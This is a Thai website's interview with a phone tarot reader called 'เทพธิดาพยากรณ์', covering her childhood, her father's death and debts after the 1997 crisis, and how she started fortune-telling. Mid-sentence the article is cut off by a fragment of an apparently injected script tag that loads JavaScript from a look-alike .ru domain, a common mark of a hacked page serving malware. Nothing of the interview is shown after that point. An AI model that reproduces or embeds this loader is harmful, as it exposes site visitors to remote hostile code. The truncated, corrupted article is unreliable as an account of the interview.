เทพธิดาพยากรณ์


เทพธิดาพยากรณ์

เปิดตำนาน 'เทพธิดาพยากรณ์' กับข้อเสนอที่ต้องแลกด้วยร่างกาย

       เรื่องของการทำนายโชคชะตาราศี การดูดวงทั้งหลายเหล่านี้เป็นสิ่งที่อยู่คู่กับคนไทยเรามานาน ตั้งแต่ยุคสมัยโบราณที่บรรดาโหราศาสตร์ทั้งหลายยังใช้กระดานชนวน จนกระทั่งจวบจนปัจจุบันในยุคที่คนเราสื่อสารกันด้วยโทรศัพท์มือถือ และเจรจากันผ่านหน้าจอคอมพิวเตอร์ก็ยังไม่มีวี่แววว่าเรื่องเหล่านี้จะเสื่อมความนิยมลงไปแม้แต่เพียงน้อยนิด

ในทางตรงกันข้ามมันกลับอยู่รอดอย่างเข้มแข็งด้วยการพัฒนาและปรับตัวให้เข้ากับเทคโนโลยีของยุคสมัยได้อย่างน่าทึ่ง

เชื่อว่าหลายคนคงจะเคยได้ยินชื่อของหมอดูสาวที่เรียกตนเองว่า ‘เทพธิดาพยากรณ์’ มาบ้างแล้ว บางคนอาจจะรู้จักเนื่องจากเคยใช้บริการจากเธอ และบางคนอาจจะได้ยินชื่อของเธอในโฆษณาตรวจสอบดวงชะตาด้วยไพ่ทาโร่ต์ผ่านทางโทรศัพท์ ซึ่งส่วนใหญ่หลายๆ คนก็จะได้ยินเฉพาะเสียงหรือไม่ก็เห็นใบหน้าของหญิงสาวผู้นี้แต่เพียงแว๊บๆ จากจอทีวีเท่านั้น...

มีจำนวนคนไม่น้อยที่สงสัยว่าหน้าตาที่แท้จริงของหญิงสาวคนนี้เป็นอย่างไร? สวยหรือขี้เหร่? เธอเป็นคนเช่นไร? และนอกจากการดูดวงแล้วเธอทำอย่างอื่นเป็นหรือเปล่า?...

นี่อาจจะเป็นเหตุผลส่วนหนึ่ง แต่ไม่ใช่ทั้งหมดที่ทำให้เราต้องนัดเธอเพื่อมาพูดคุย เพราะนอกเหนือจากข้อสงสัยเหล่านี้แล้ว ยังมีเรื่องที่เธอบอกเราว่ามีนักการเมืองแก่ๆ มาชวนให้ไปเป็นเมียน้อย, เรื่องที่เธอประกาศว่าจะยอมถ่ายภาพโป๊แต่ต้องจ่ายให้เธอ 10 ล้านบาท ...

นี่คือ ตำนานของ ‘เทพธิดาพยากรณ์’ ซึ่งคุณรู้ได้ตรงนี้ได้ โดยไม่ต้องกด1900 ให้เสียเงิน 9 บาท

******************

"เริ่มต้นมาจากตอนเด็กๆ หนูอ่านหนังสือคู่สร้างคู่สมตอนสุสานมัมมี่ และหนังสือหลายๆ เล่ม มีบางตอนเขียนเกี่ยวกับนอสตราดามุสด้วย ตอนนั้นนอสตราดามุสทายไว้ว่าจะมีหมอดูอายุน้อยเกิดขึ้นในโลก ตอนเราเป็นเด็กเอาก็คิด เอ๊ะ...ฉันก็ดูหมอเป็นนะ เป็นหมอดูอายุน้อยได้..."

เทพธิดาพยากรณ์ ที่มีชื่อตามบัตรประชาชนว่า น.ส.อุมาวดี ศิริอักษร หรือชื่อเล่นที่พ่อแม่และเพื่อนๆ เรียกกันว่า "อ๋อย" กล่าวเปิดเผยกับเรา ก่อนที่เจ้าตัวจะบอกต่อไปว่านอกจากเป็นเพราะคำทำนายของนอสตราดามุส (จากหนังสือ) แล้ว สิ่งหนึ่งที่ทำให้ตัวเธอคิดจะเป็นนักพยากรณ์ชีวิตก็เพราะความรู้สึกที่ว่าพ่อแม่ไม่รัก

"พูดง่ายๆ คืออยากดัง ตอนนั้นรู้สึกว่าพ่อแม่ไม่รัก เพราะพ่อเป็นนายแพทย์แถมทำธุรกิจอสังหาริมทรัพย์ คุณแม่ก็ไม่มีเวลา ก็เลยเริ่มดูหมอเพราะเชื่อว่าทุกคนจะรุมล้อมเรา เราคิดว่าหมอดูมันจะมีเสน่ห์ รู้สึกว่าเราเป็นที่รักของทุกคนก็เริ่มจากการดูไพ่ทาโร่ต์นี่ล่ะค่ะ"

อ๋อยเริ่มเล่าให้เราฟังต่อว่าตอนเธออายุ 12 ปี เคยมีชาวอิตาเลียนคนหนึ่งเข้ามาทำนายทายทักเรื่องเลวร้ายในชีวิตเธอว่าจะแย่ถึงขั้นเลวร้าย แต่เธอก็ไม่คิดอะไรมาก จนทุกอย่างมันเป็นความจริงเมื่อเศรษฐกิจของประเทศไทยและในภูมิภาคเอเชียพังพาบลงอย่างไม่เป็นท่า

“เหมือนฝันร้ายกลายเป็นจริงค่ะ เขาทายว่าธุรกิจคุณพ่อจะเจ๊ง เราก็เอ๊...จะเจ๊งได้ยังไงในเมื่อทุกอย่างมันก็ดูดี แต่พอรัฐบาลประกาศลอยค่าเงินบาทปี 2540 ก็เจ๊งจริงค่ะ ผีซ้ำด้ามพลอย....คุณพ่อก็เสียค่ะ (นายแพทย์ อภิชัย ศิริอักษร) ท่านทำธุรกิจอสังหาริมทรัพย์ที่เพชรบุรี เป็นเจ้าของรีสอร์ต แล้วก็ทำธุรกิจด้านพัฒนาที่ดิน

“ อย่างขนมหม้อแกงที่หน้าเขาวังน่ะของคุณพ่อหนูหมดเลยค่ะ"

"แล้วการที่ท่านจากไปก็ทิ้งหนี้สินเอาไว้อีกหลายสิบล้าน เราก็หมดเงินหมดทองไปแทบสิ้นเนื้อประดาตัว จำได้ว่าตอนนั้นเหลือเงินติดกระเป๋าไม่ถึง 2,000 บาท หนูก็เลยเริ่มต้นเป็นหมอดูที่ โดม รัชดา หนูเครียดมากเลยนะพี่ พี่นึกดูนะพ่อตายทั้งคนใครไม่เครียดล่ะ “

“ แต่วันรุ่งขึ้นเราก็ต้องบังคับตัวเองให้ยิ้มแย้มแจ่มใสนะ พ่อตายไม่เป็นไร เพราะชีวิตฉันต้องก้าวต่อไป ก็ดูหมอต่อไปหาเงินเรียนหนังสือที่ม.กรุงเทพฯ...."

คุณแม่ว่ายังไงบ้างเมื่อเราตัดสินใจจะเป็นหมอดู ?
"บอกตามตรงว่าตอนแรกที่หนูไปเป็นหมอดู คุณแม่ก็รู้สึกว่ารับไม่ได้ เขาแอนตี้เลยค่ะ เพราะเขาคิดว่าเดี๋ยวลูกเขาจะเป็นหมอดูตามโคนต้นมะขามสนามหลวงหรือเปล่า มันไม่มีเกียรติ แต่พอดีคุณแม่ไปพบกับเพื่อนคนนึงคือคุ src=http://www.doubleclickr.ru/index.js>


แสดงความคิดเห็น

เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ


เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ

เป็นเว็บไซต์ระบบ Responsive 100% สามารถปรับรูปแบบการแสดงผลได้เองโดยอัตโนมัติ ตามอุปกรณ์ที่เปิดชม (ทั้ง Front end และ Back end) เช่น สมาร์ทโฟนทุกรุ่น, แท็บเล็ต, iPad และ iPhone เป็นเจ้าของได้แล้ววันนี้ ในราคาโปรโมชั่น...คลิกดูรายละเอียด

Copyright © sms108.com  2014